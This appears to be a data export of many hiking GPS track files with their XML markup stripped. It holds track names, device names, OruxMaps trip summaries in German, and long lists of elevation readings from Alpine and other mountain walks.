+ +1290.23 + + +1272.92 + + +1261.39 + + +1252.25 + + +1248.41 + + +1210.44 + + +1204.67 + + +1205.15 + + +1194.58 + + +1190.25 + + +1184.96 + + +1168.62 + + +1127.76 + + +1113.34 + + +1115.27 + + +1109.02 + + +1096.04 + + +1090.27 + + +1089.31 + + +1094.12 + + +1108.06 + + +1087.39 + + +1097.48 + + +1072.01 + + +1060.95 + + +1059.03 + + +1053.74 + + +1049.9 + + +1037.4 + + +1029.23 + + +1016.25 + + +1018.65 + + +970.59 + + +952.32 + + +933.58 + + +926.85 + + +922.52 + + +915.79 + + +891.76 + + +822.06 + + +793.22 + + +783.61 + + +784.09 + + +786.02 + + +787.46 +" +" + + + +Polar + + + + + + + + +1360.0 + + + +1353.0 + + + +1351.0 + + + +1344.0 + + + +1333.0 + + + +1331.0 + + + +1342.0 + + + +1345.0 + + + +1361.0 + + + +1364.0 + + + +1368.0 + + + +1388.0 + + + +1420.0 + + + +1470.0 + + + +1515.0 + + + +1542.0 + + + +1581.0 + + + +1600.0 + + + +1624.0 + + + +1640.0 + + + +1652.0 + + + +1709.0 + + + +1721.0 + + + +1751.0 + + + +1757.0 + + + +1769.0 + + + +1777.0 + + + +1801.0 + + + +1808.0 + + + +1825.0 + + + +1841.0 + + + +1868.0 + + + +1909.0 + + + +1917.0 + + + +1953.0 + + + +2003.0 + + + +2055.0 + + + +2085.0 + + + +2111.0 + + + +2127.0 + + + +2152.0 + + + +2170.0 + + + +2185.0 + + + +2216.0 + + + +2254.0 + + + +2271.0 + + + +2291.0 + + + +2303.0 + + + +2324.0 + + + +2328.0 + + + +2347.0 + + + +2388.0 + + + +2394.0 + + + +2432.0 + + + +2418.0 + + + +2407.0 + + + +2399.0 + + + +2462.0 + +" +" + + + + + + + + + + +850.0 + + + +849.799987792969 + + + +854.400024414062 + + + +862.400024414062 + + + +874.799987792969 + + + +890.400024414062 + + + +894.599975585938 + + + +897.400024414062 + + + +901.799987792969 + + + +910.400024414062 + + + +914.599975585938 + + + +933.0 + + + +946.799987792969 + + + +956.599975585938 + + + +992.599975585938 + + + +1019.20001220703 + + + +1032.59997558594 + + + +1054.40002441406 + + + +1089.19995117188 + + + +1100.0 + + + +1114.80004882812 + + + +1182.59997558594 + + + +1189.0 + + + +1206.0 + + + +1222.0 + + + +1246.0 + + + +1256.0 + + + +1264.0 + + + +1328.80004882812 + + + +1356.0 + + + +1362.59997558594 + + + +1367.59997558594 + + + +1383.59997558594 + + + +1400.40002441406 + + + +1412.59997558594 + + + +1425.40002441406 + + + +1451.19995117188 + + + +1492.80004882812 + + + +1519.0 + + + +1526.19995117188 + + + +1542.19995117188 + + + +1549.80004882812 + + + +1596.80004882812 + + + +1602.40002441406 + + + +1619.0 + + + +1638.19995117188 + + + +1654.59997558594 + + + +1666.0 + + + +1685.0 + + + +1677.19995117188 + + + +1674.59997558594 + + + +1714.19995117188 + + + +1753.59997558594 + + + +1769.80004882812 + + + +1786.80004882812 + + + +1799.59997558594 + + + +1808.59997558594 + + + +1859.19995117188 + + + +1891.0 + +" +" + + + + Lovere - S. Giovanni + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Emeindra + + + + + +OruxMaps + + + +Emeindra +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Emeindra</h2><br /><p>Startzeit: 06/02/2016 11:56</p><p>Zielzeit: 06/02/2016 13:36</p><p>Strecke: 5,3km (01:39)</p><p>Bewegungszeit: 01:15</p><p>Ø-Geschwindigkeit: 3,2km/h</p><p>Netto-Geschwindigkeit: 4,2km/h</p><p>Max. Geschwindigkeit: 7,8km/h</p><p>Minimale Höhe: 981m</p><p>Maximale Höhe: 1490m</p><p>Steig-Geschw.: 437,9m/h</p><p>Sink-Geschw.: -397m/h</p><p>Aufstieg: 565m</p><p>Abstieg: -56m</p><p>Steigzeit: 01:17</p><p>Sinkzeit: 00:08</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +981.44 + + + +987.13 + + + +990.85 + + + +998.88 + + + +998.87 + + + +1006.88 + + + +1005.13 + + + +1014.97 + + + +1014.75 + + + +1019.21 + + + +1025.82 + + + +1033.4 + + + +1034.26 + + + +1034.04 + + + +1054.75 + + + +1060.89 + + + +1074.61 + + + +1089.83 + + + +1085.27 + + + +1086.67 + + + +1089.9 + + + +1110.01 + + + +1153.5 + + + +1188.85 + + + +1191.28 + + + +1207.24 + + + +1214.88 + + + +1223.41 + + + +1238.75 + + + +1302.41 + + + +1320.76 + + + +1330.37 + + + +1331.0 + + + +1332.77 + + + +1329.89 + + + +1344.24 + + + +1349.81 + + + +1343.01 + + + +1349.0 + + + +1351.91 + + + +1358.01 + + + +1377.81 + + + +1391.97 + + + +1420.73 + + + +1433.37 + + + +1385.88 + + + +1431.87 + + + +1479.79 + + + +1488.22 + + + +1486.94 + +" +" + + + + + + +Garmin International + + + +Track 038 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + +Faleralp - Blatten + + + +1764.32421875 + + +1764.0625 + + +1766.20703125 + + +1771.56640625 + + +1780.89453125 + + +1783.00390625 + + +1779.4609375 + + +1779.51171875 + + +1789.77734375 + + +1794.21484375 + + +1802.93359375 + + +1835.5 + + +1854.5390625 + + +1856.69921875 + + +1849.24609375 + + +1855.13671875 + + +1848.890625 + + +1834.24609375 + + +1828.88671875 + + +1838.0703125 + + +1845.296875 + + +1848.77734375 + + +1862.046875 + + +1850.703125 + + +1861.76171875 + + +1849.72265625 + + +1856.48828125 + + +1857.234375 + + +1846.30078125 + + +1831.60546875 + + +1807.4609375 + + +1796.69140625 + + +1765.43359375 + + +1751.34375 + + +1738.88671875 + + +1731.9921875 + + +1723.05859375 + + +1694.3125 + + +1669.78515625 + + +1674.07421875 + + +1663.14453125 + + +1671.1328125 + + +1652.83203125 + + +1643.8046875 + + +1621.03125 + + +1618.33984375 + + +1599.09765625 + + +1584.74609375 + + +1573.40234375 + + +1578.6328125 + + +1577.5 + + +1570.62890625 + + +1570.140625 + + +1559.37109375 + + +1555.1171875 + + +1541.45703125 + + +1535.9921875 + + +1533.2109375 + + +1536.40234375 + + +1531.45703125 + + +1528.69921875 + + +1526.11328125 + + +1527.12890625 + + +1527.60546875 +" +" + + + + + + + +Font d'Urle +15 juin 2017 12:32 pm + + + +1445.653 + + + +1442.894 + + + +1446.01 + + + +1449.982 + + + +1453.646 + + + +1459.448 + + + +1484.352 + + + +1496.28 + + + +1525.979 + + + +1523.846 + + + +1525.277 + + + +1535.141 + + + +1549.781 + + + +1547.412 + + + +1547.545 + + + +1547.39 + + + +1544.904 + + + +1545.895 + + + +1547.235 + + + +1536.243 + + + +1537.245 + + + +1541.734 + + + +1543.669 + + + +1539.197 + + + +1536.827 + + + +1536.734 + + + +1538.535 + + + +1534.368 + + + +1520.95 + + + +1521.73 + + + +1523.798 + + + +1522.298 + + + +1525.623 + + + +1529.762 + + + +1547.408 + + + +1552.18 + + + +1553.415 + + + +1554.275 + + + +1551.287 + + + +1550.34 + + + +1547.154 + + + +1546.807 + + + +1560.619 + + + +1567.281 + + + +1582.863 + + + +1599.398 + + + +1591.413 + + + +1562.574 + + + +1549.573 + + + +1537.548 + + + +1527.577 + + + +1533.735 + + + +1535.359 + + + +1530.121 + + + +1532.706 + + + +1531.417 + + + +1524.827 + + + +1520.415 + + + +1519.607 + + + +1517.761 + + + +1511.862 + + + +1502.224 + + + +1500.969 + + + +1488.858 + + + +1482.2 + + + +1473.867 + + + +1454.639 + + + +1453.027 + + + +1450.73 + + + +1447.546 + + + +1446.253 + + + +1441.26 + + + +1441.603 + + + +1443.286 + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + +User Track +Track 1 + + + +1625.5 + +0.0 kmh + + +1624.3 + +0.9 kmh + + +1622.3 + +1.4 kmh + + +1624.0 + +5.0 kmh + + +1623.7 + +5.0 kmh + + +1642.1 + +5.0 kmh + + +1645.3 + +4.2 kmh + + +1673.5 + +5.0 kmh + + +1686.8 + +3.9 kmh + + +1685.6 + +5.0 kmh + + +1688.7 + +5.0 kmh + + +1689.4 + +3.5 kmh + + +1690.1 + +5.0 kmh + + +1693.6 + +5.0 kmh + + +1695.4 + +5.0 kmh + + +1699.8 + +4.2 kmh + + +1705.5 + +3.1 kmh + + +1714.2 + +5.0 kmh + + +1725.0 + +5.0 kmh + + +1731.1 + +5.0 kmh + + +1733.2 + +4.3 kmh + + +1734.3 + +5.0 kmh + + +1737.9 + +5.0 kmh + + +1738.8 + +5.0 kmh + + +1741.8 + +5.0 kmh + + +1744.0 + +2.8 kmh + + +1748.2 + +3.4 kmh + + +1758.6 + +4.5 kmh + + +1763.7 + +5.0 kmh + + +1773.4 + +5.0 kmh + + +1779.4 + +5.0 kmh + + +1788.7 + +4.5 kmh + + +1815.0 + +2.9 kmh + + +1841.0 + +5.0 kmh + + +1843.6 + +5.0 kmh + + +1846.2 + +5.0 kmh + + +1852.5 + +6.2 kmh + + +1857.6 + +5.0 kmh + + +1865.1 + +5.0 kmh + + +1876.0 + +5.0 kmh + + +1880.7 + +5.0 kmh + + +1880.7 + +5.0 kmh + + +1914.6 + +5.0 kmh + + +1979.5 + +5.0 kmh + + +1996.6 + +5.0 kmh + + +2010.0 + +0.2 kmh + + +2016.2 + +5.0 kmh + + +2026.1 + +3.8 kmh + + +2035.1 + +4.5 kmh + + +2056.5 + +3.5 kmh + + +2066.8 + +5.0 kmh + + +2084.9 + +5.0 kmh + + +2123.2 + +2.3 kmh + + +2133.9 + +5.0 kmh + + +2146.4 + +5.0 kmh + + +2211.5 + +1.7 kmh + + +2223.5 + +0.6 kmh + + +2277.0 + +1.9 kmh + + +2286.0 + +5.0 kmh + + +2288.1 + +2.2 kmh + + +2305.8 + +5.0 kmh +" +" + + +bärhegechnübeli + + + + + + + + + +751.0999635000858 + + +750.5 + + +749.800010034398 + + +747.4000204049638 + + +754.4999924549464 + + +761.4000028787494 + + +765.2999981844442 + + +766.0999992224166 + + +765.0999779734503 + + +765.5000040799783 + + +767.7000262619223 + + +778.8999764580028 + + +785.0000790309945 + + +798.7000146531177 + + +800.1000031189275 + + +797.9000058530834 + + +797.1999835588765 + + +804.4000025641919 + + +807.4999930883141 + + +818.3999678038905 + + +824.2000080315873 + + +836.8999941582957 + + +860.1998343975217 + + +883.4000691998158 + + +879.0998263834271 + + +884.9999845489 + + +902.1 + + +907.5999595789211 + + +913.1000464748016 + + +918.5 + + +925.9 + + +941.3999418125525 + + +950.5999952915345 + + +954.1 + + +983.6 + + +977.3999441597006 + + +971.7999953792273 + + +971.5999344014202 + + +950.5999699983729 + + +947.6 + + +955.4999750129854 + + +943.9 + + +919.6000472923923 + + +906.4000594487754 + + +895.1999845042329 + + +890.7999948004757 + + +885.4000130167366 + + +877.3999382205712 + + +872.8000337470274 + + +870.2 + + +863.6999683205207 + + +854.3001143767326 + + +829.0001200954649 + + +766.1999706895543 + + +761.7 + + +754.7999811446837 + + +753.7999963888257 + + +751.1000444574457 +" +" + + +ape@map my Phone my Guide + + + + + +2017-10-01 11_22_19 + + + +975.0 + + + +975.0 + + + +974.0 + + + +968.0 + + + +962.0 + + + +959.0 + + + +959.0 + + + +961.0 + + + +967.0 + + + +956.0 + + + +946.0 + + + +942.0 + + + +945.0 + + + +943.0 + + + +932.0 + + + +927.0 + + + +925.0 + +" +" + + + + + + + +Lupone + + +Lupone_0 + + +Lupone_1 + + +Lupone_2 + + +Lupone_3 + + +Lupone_4 + + +Lupone_5 + + +Lupone_6 + + +Lupone_7 + + +Lupone_8 + + +Lupone_9 + + +Lupone_10 + + +Lupone_11 + + +Lupone_12 + + +Lupone_13 + + +Lupone_14 + + +Lupone_15 + + +Lupone_16 + + +Lupone_17 + + +Lupone_18 + + +Lupone_19 + + +Lupone_20 + + +Lupone_21 + + +Lupone_22 + + +Lupone_23 + + +Lupone_24 + + +Lupone_25 + + +Lupone_26 + + +Lupone_27 + + +Lupone_28 + + +Lupone_29 + + +Lupone_30 + + +Lupone_31 + + +Lupone_32 + + +Lupone_33 + + +Lupone_34 + + +Lupone_35 + + +Lupone_36 + + +Lupone_37 + + +Lupone_38 + + +Lupone_39 + + +Lupone_40 + + +Lupone_41 + + +Lupone_42 + + +Lupone_43 + + +Lupone_44 + + +Lupone_45 + + +Lupone_46 + + +Lupone_47 + + +Lupone_48 + + +Lupone_49 + + +Lupone_50 + + +Lupone_51 + + +Lupone_52 + + +Lupone_53 + + +Lupone_54 + + +Lupone_55 + + +Lupone_56 + + +Lupone_57 + + +Lupone_58 + + +Lupone_59 + + +Lupone_60 + + +Lupone_61 + + +Lupone_62 + + +Lupone_63 + + +Lupone_64 + + +Lupone_65 + + +Lupone_66 + + +Lupone_67 + + +Lupone_68 + + +Lupone_69 + + +Lupone_70 + + +Lupone_71 + + +Lupone_72 + + +Lupone_73 + + +Lupone_74 + + +Lupone_75 + + +Lupone_76 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + +" +" + + + + + + + +Linie + + + +1094.1 + + +1100.4 + + +1118.9 + + +1134.0 + + +1160.6 + + +1181.7 + + +1191.0 + + +1219.9 + + +1271.9 + + +1271.0 + + +1286.0 + + +1282.2 + + +1288.2 + + +1274.5 + + +1290.2 + + +1291.0 + + +1285.1 + + +1289.2 + + +1295.4 + + +1322.0 + + +1307.4 + + +1322.8 + + +1317.1 + + +1336.0 + + +1331.9 + + +1319.7 + + +1336.5 + + +1326.1 + + +1330.8 + + +1342.2 + + +1339.8 + + +1349.4 + + +1342.8 + + +1342.9 + + +1363.9 + + +1376.9 + + +1424.4 + + +1434.4 + + +1442.9 + + +1458.6 + + +1463.1 + + +1477.0 + + +1494.5 + + +1518.1 + + +1523.7 + + +1524.9 + + +1507.9 + + +1513.2 + + +1501.4 + + +1501.4 + + +1514.4 + + +1476.3 + + +1494.2 + + +1474.9 + + +1494.1 + + +1472.9 + + +1460.5 + + +1477.9 + + +1466.5 + + +1485.4 + + +1442.2 + + +1455.8 + + +1466.0 + + +1447.0 + + +1453.5 + + +1461.1 + + +1478.1 + + +1450.8 + + +1443.7 + + +1438.1 + + +1419.9 + + +1412.5 + + +1388.5 + + +1360.6 + + +1355.2 + + +1350.2 + + +1337.4 + + +1317.7 + + +1292.6 + + +1262.0 + + +1245.8 + + +1211.3 + + +1195.3 + + +1190.3 + + +1182.5 +" +" + + +aguille pets rück + + + + + +OruxMaps + + + +aguille pets rück +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: aguille pets rück</h2><br /><p>Startzeit: 07/28/2015 10:15</p><p>Zielzeit: 07/28/2015 11:41</p><p>Strecke: 3km (01:25)</p><p>Bewegungszeit: 00:54</p><p>Ø-Geschwindigkeit: 2,1km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 7,4km/h</p><p>Minimale Höhe: 2738m</p><p>Maximale Höhe: 3344m</p><p>Steig-Geschw.: 503,5m/h</p><p>Sink-Geschw.: -508,6m/h</p><p>Aufstieg: 51m</p><p>Abstieg: -636m</p><p>Steigzeit: 00:06</p><p>Sinkzeit: 01:15</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +3344.63 + + + +3313.15 + + + +3305.5 + + + +3296.52 + + + +3278.65 + + + +3260.29 + + + +3250.66 + + + +3241.16 + + + +3200.15 + + + +3170.77 + + + +3160.39 + + + +3122.05 + + + +3125.53 + + + +3104.08 + + + +3065.05 + + + +3062.43 + + + +3048.36 + + + +3038.89 + + + +2980.04 + + + +2924.89 + + + +2894.09 + + + +2857.33 + + + +2840.88 + + + +2836.88 + + + +2812.17 + + + +2786.69 + + + +2743.85 + + + +2759.86 + + + +2753.42 + + + +2756.49 + +" +" + + + + + + + +CnocMordain + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +Track 038 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +19.07.2015 11:39 + +Andre Bartholdi + + + +Sports Tracker + + + + +3671.0 + + + +3655.0 + + + +3650.0 + + + +3642.0 + + + +3625.0 + + + +3618.0 + + + +3615.0 + + + +3591.0 + + + +3596.0 + + + +3575.0 + + + +3553.0 + + + +3522.0 + + + +3500.0 + + + +3476.0 + + + +3495.0 + + + +3490.0 + + + +3477.0 + + + +3469.0 + + + +3474.0 + + + +3474.0 + + + +3461.0 + + + +3464.0 + + + +3469.0 + + + +3463.0 + + + +3465.0 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + +capanne + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Kandersteg + +Monika Teusch - Community + + + + + +Kandersteg + + + +1181.40479 + + +1176.14877 + + +1177.41623 + + +1175.92416 + + +1179.1567 + + +1172.06747 + + +1172.35202 + + +1173.22641 + + +1171.47494 + + +1174.69516 + + +1175.14291 + + +1180.08859 + + +1173.46408 + + +1176.82284 + + +1182.1318 + + +1189.20187 + + +1198.85409 + + +1205.68527 + + +1219.86129 + + +1226.6799 + + +1236.04245 + + +1250.90439 + + +1259.1766 + + +1273.83639 + + +1277.17282 + + +1287.39474 + + +1308.01022 + + +1318.19772 + + +1311.52499 + + +1304.61813 + + +1304.31503 + + +1301.64816 + + +1293.50424 + + +1289.71701 + + +1286.14108 + + +1279.72006 + + +1268.75839 + + +1268.43209 + + +1263.13144 + + +1254.69626 + + +1248.68637 + + +1225.40793 + + +1213.8049 + + +1214.22018 + + +1211.18966 + + +1210.91793 + + +1209.77548 + + +1209.0903 + + +1192.12704 + + +1174.78085 + + +1173.10202 + + +1174.69308 + + +1176.42196 + + +1174.29269 + + +1176.70285 + + +1176.82724 + + +1175.96798 + + +1181.93295 +" +" + + +pic St michel + + + + + +OruxMaps + + + +pic St michel +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: pic St michel</h2><br /><p>Startzeit: 05/05/2016 11:10</p><p>Zielzeit: 05/05/2016 12:40</p><p>Strecke: 4,8km (01:29)</p><p>Bewegungszeit: 01:11</p><p>Ø-Geschwindigkeit: 3,2km/h</p><p>Netto-Geschwindigkeit: 4km/h</p><p>Max. Geschwindigkeit: 9km/h</p><p>Minimale Höhe: 1214m</p><p>Maximale Höhe: 1959m</p><p>Steig-Geschw.: 560,2m/h</p><p>Sink-Geschw.: -298,5m/h</p><p>Aufstieg: 758m</p><p>Abstieg: -19m</p><p>Steigzeit: 01:21</p><p>Sinkzeit: 00:04</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1214.63 + + + +1281.46 + + + +1267.92 + + + +1279.93 + + + +1289.94 + + + +1286.0 + + + +1295.42 + + + +1311.57 + + + +1319.82 + + + +1336.96 + + + +1365.05 + + + +1390.1 + + + +1429.8 + + + +1433.31 + + + +1439.64 + + + +1446.61 + + + +1436.08 + + + +1444.95 + + + +1445.79 + + + +1445.55 + + + +1445.9 + + + +1449.35 + + + +1453.7 + + + +1458.97 + + + +1471.42 + + + +1468.21 + + + +1471.46 + + + +1480.43 + + + +1486.05 + + + +1506.92 + + + +1508.54 + + + +1534.95 + + + +1536.57 + + + +1549.54 + + + +1559.15 + + + +1585.4 + + + +1588.48 + + + +1600.2 + + + +1606.49 + + + +1621.13 + + + +1647.07 + + + +1680.4 + + + +1675.57 + + + +1683.02 + + + +1696.47 + + + +1698.64 + + + +1705.69 + + + +1736.05 + + + +1748.01 + + + +1759.18 + + + +1842.04 + + + +1845.49 + + + +1867.55 + + + +1869.33 + + + +1903.54 + + + +1927.29 + + + +1926.63 + + + +1927.61 + + + +1951.02 + + + +1959.18 + +" +" + + + + + + +Garmin International + + +2015-01-18 15:27:46 + + + + + + +1569.01 + + + +1592.56 + + + +1593.52 + + + +1590.16 + + + +1593.52 + + + +1591.6 + + + +1586.31 + + + +1579.58 + + + +1575.26 + + + +1570.45 + + + +1562.28 + + + +1552.67 + + + +1543.53 + + + +1531.04 + + + +1512.29 + + + +1507.0 + + + +1499.31 + + + +1485.85 + + + +1481.53 + + + +1481.05 + + + +1460.38 + + + +1456.05 + + + +1443.56 + + + +1430.58 + + + +1420.0 + + + +1401.74 + + + +1379.15 + + + +1365.69 + + + +1356.08 + + + +1336.37 + + + +1333.49 + + + +1334.93 + + + +1345.5 + + + +1341.18 + + + +1339.73 + + + +1349.83 + + + +1351.27 + + + +1358.96 + + + +1384.44 + + + +1383.96 + + + +1390.68 + + + +1392.61 + + + +1394.05 + + + +1401.74 + + + +1407.03 + + + +1418.08 + + + +1419.04 + + + +1420.97 + + + +1420.49 + + + +1415.2 + + + +1408.47 + + + +1393.57 + + + +1388.28 + + + +1383.47 + +" +" + + + + + + + + + +Traccia corrente: 27 GIU 2015 08:21 +Traccia corrente: 27 GIU 2015 08:21 + + + +1233.98999 + + + +1229.179932 + + + +1231.589966 + + + +1252.740112 + + + +1269.080078 + + + +1281.090088 + + + +1293.589966 + + + +1315.699951 + + + +1325.799927 + + + +1332.52002 + + + +1354.150024 + + + +1359.919922 + + + +1364.72998 + + + +1390.680054 + + + +1395.969971 + + + +1406.550049 + + + +1414.719971 + + + +1428.179932 + + + +1437.789917 + + + +1447.880127 + + + +1457.02002 + + + +1470.469971 + + + +1489.220093 + + + +1498.350098 + + + +1527.669922 + + + +1554.589966 + + + +1567.090088 + + + +1573.820068 + + + +1599.290039 + + + +1619.960083 + + + +1629.570068 + + + +1648.319946 + + + +1658.409912 + + + +1692.539917 + + + +1720.419922 + + + +1722.819946 + + + +1731.469971 + + + +1733.390015 + + + +1746.369995 + + + +1758.869995 + + + +1763.679932 + + + +1776.170044 + + + +1782.900024 + + + +1787.230103 + + + +1808.380005 + + + +1819.429932 + + + +1870.859985 + + + +1878.069946 + + + +1881.440063 + + + +1910.280029 + + + +1912.679932 + + + +1924.699951 + + + +1946.809937 + + + +1958.339966 + + + +1960.27002 + + + +1980.450073 + + + +1998.239868 + + + +2022.27002 + + + +2040.540039 + + + +2100.139893 + + + +2106.390137 + + + +2124.169922 + + + +2203.47998 + + + +2211.649902 + + + +2215.5 + + + +2285.670166 + + + +2300.570068 + + + +2333.26001 + + + +2356.810059 + + + +2368.350098 + + + +2378.439941 + + + +2410.159912 + + + +2426.98999 + +" +" + + + + + + +Garmin International + + + +2017-01-08 13:12:01 + + + + + + + + +572.62 + + + +574.14 + + + +579.98 + + + +586.08 + + + +585.81 + + + +584.96 + + + +576.87 + + + +581.76 + + + +579.32 + + + +580.91 + + + +579.57 + + + +568.52 + + + +557.35 + + + +555.58 + + + +538.07 + +" +" + + + + + + + +FInish + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +2016-09-25-01 + + + + + + +1459.6 + + + +1458.9 + + + +1474.5 + + + +1473.9 + + + +1461.0 + + + +1468.6 + + + +1470.2 + + + +1476.8 + + + +1488.8 + + + +1515.8 + + + +1542.4 + + + +1546.9 + + + +1535.6 + + + +1549.7 + + + +1566.5 + + + +1576.2 + + + +1579.7 + + + +1588.5 + + + +1617.0 + + + +1629.8 + + + +1637.5 + + + +1638.8 + + + +1647.3 + + + +1655.8 + + + +1665.1 + + + +1674.9 + + + +1687.5 + + + +1647.1 + + + +1644.1 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + +Omey + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +roggen 2018-01 + + + + + + + + + +500.2000537471803 + + +507.0000372607535 + + +525.4000081437339 + + +552.0000671138458 + + +584.4000074571355 + + +591.0999709265405 + + +596.4000003165072 + + +603.8000700615019 + + +610.5000817538462 + + +617.4998644022367 + + +623.7 + + +628.4999184338776 + + +632.5000354182092 + + +648.761062680733 + + +664.4999770694059 + + +677.100152934708 + + +695.2 + + +701.3998504637382 + + +730.2 + + +739.2000106933872 + + +749.7001396319287 + + +773.2001124822964 + + +814.7 + + +846.3999335018326 + + +854.700051224318 + + +868.2000156174431 + + +892.8000788952016 + + +933.1998983347236 + + +974.4998882026714 + + +996.8000007621342 + + +997.2999977339209 + + +996.5999620793926 + + +949.6000942589088 + + +942.3999616629795 + + +928.5 + + +908.7999675274789 + + +883.599961448275 + + +869.8000211773698 + + +849.2 + + +838.0999641336422 + + +830.6000172968124 + + +827.5000191384531 + + +822.8639637906598 + + +817.6999375798724 + + +805.3511480938297 + + +802.4969279289819 + + +803.099999585324 + + +803.4999285897027 + + +797.2998902786918 + + +787.2999316327728 + + +777.300025215549 + + +752.7999958473797 + + +741.600015643222 + + +744.5000248419298 + + +758.0999897091766 + + +761.599996610942 + + +769.5999774041952 + + +764.2037642222323 + + +755.8999968813548 + + +751.4999998764393 + + +740.200069766434 + + +681.999989968073 + + +673.1984843489736 + + +664.3 + + +642.800028274461 + + +626.0 + + +613.3000135409167 + + +593.800085943625 + + +587.80004219378 + + +575.0 + + +552.8000400157371 + + +525.4000081435004 + + +507.00003726053416 + + +500.1000539543323 +" +" + + +Rotbachlspitze + + + + + +OruxMaps + + + +Rotbachlspitze +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Rotbachlspitze</h2><br /><p>Startzeit: 09/10/2015 07:53</p><p>Zielzeit: 09/10/2015 11:08</p><p>Strecke: 4,6km (03:15)</p><p>Bewegungszeit: 01:39</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,8km/h</p><p>Max. Geschwindigkeit: 5,3km/h</p><p>Minimale Höhe: 1772m</p><p>Maximale Höhe: 2893m</p><p>Steig-Geschw.: 353,5m/h</p><p>Sink-Geschw.: -151,9m/h</p><p>Aufstieg: 1096m</p><p>Abstieg: -9m</p><p>Steigzeit: 03:06</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1772.24 + + + +1773.31 + + + +1805.26 + + + +1790.99 + + + +1829.36 + + + +1853.75 + + + +1859.41 + + + +1876.74 + + + +1891.77 + + + +1936.24 + + + +1951.09 + + + +1969.04 + + + +1968.34 + + + +1984.21 + + + +2000.12 + + + +2029.24 + + + +2052.24 + + + +2057.03 + + + +2089.22 + + + +2119.12 + + + +2147.59 + + + +2166.37 + + + +2186.24 + + + +2194.97 + + + +2208.67 + + + +2214.24 + + + +2225.71 + + + +2245.12 + + + +2244.68 + + + +2256.25 + + + +2264.74 + + + +2275.86 + + + +2290.12 + + + +2313.24 + + + +2345.24 + + + +2346.75 + + + +2352.21 + + + +2376.24 + + + +2371.75 + + + +2377.21 + + + +2383.24 + + + +2395.75 + + + +2429.25 + + + +2451.72 + + + +2463.41 + + + +2467.37 + + + +2484.59 + + + +2489.74 + + + +2488.74 + + + +2511.61 + + + +2518.11 + + + +2532.83 + + + +2546.78 + + + +2567.98 + + + +2576.24 + + + +2587.25 + + + +2587.78 + + + +2587.6 + + + +2664.74 + + + +2713.73 + + + +2787.68 + + + +2874.23 + + + +2891.24 + + + +2893.37 + +" +" + + + + + + +Garmin International + + +2014-02-27 15:29:57 + + + + + + +1600.96 + + + +1602.44 + + + +1607.29 + + + +1612.1 + + + +1620.79 + + + +1626.95 + + + +1630.36 + + + +1642.08 + + + +1651.43 + + + +1654.47 + + + +1651.29 + + + +1651.77 + + + +1653.41 + + + +1655.33 + + + +1668.44 + + + +1670.06 + + + +1675.36 + + + +1682.31 + + + +1690.06 + + + +1691.84 + + + +1693.76 + + + +1686.52 + + + +1679.2 + + + +1659.41 + + + +1643.77 + + + +1639.27 + + + +1630.9 + + + +1623.53 + + + +1625.39 + + + +1617.64 + + + +1602.29 + + + +1603.18 + + + +1602.28 + + + +1602.17 + + + +1603.99 + + + +1604.26 + + + +1605.6 + + + +1607.63 + + + +1607.85 + + + +1609.88 + + + +1611.14 + + + +1614.1 + + + +1615.2 + + + +1614.44 + + + +1615.01 + + + +1612.34 + + + +1614.54 + + + +1613.43 + + + +1615.07 + + + +1616.45 + + + +1616.53 + + + +1612.2 + + + +1607.53 + + + +1606.73 + +" +" + + + + + + +Garmin International + + +2017-07-31 14:35:48 + + + + + +1939.6 + + + +2059.76 + + + +2064.57 + + + +2093.89 + + + +2126.57 + + + +2147.24 + + + +2169.83 + + + 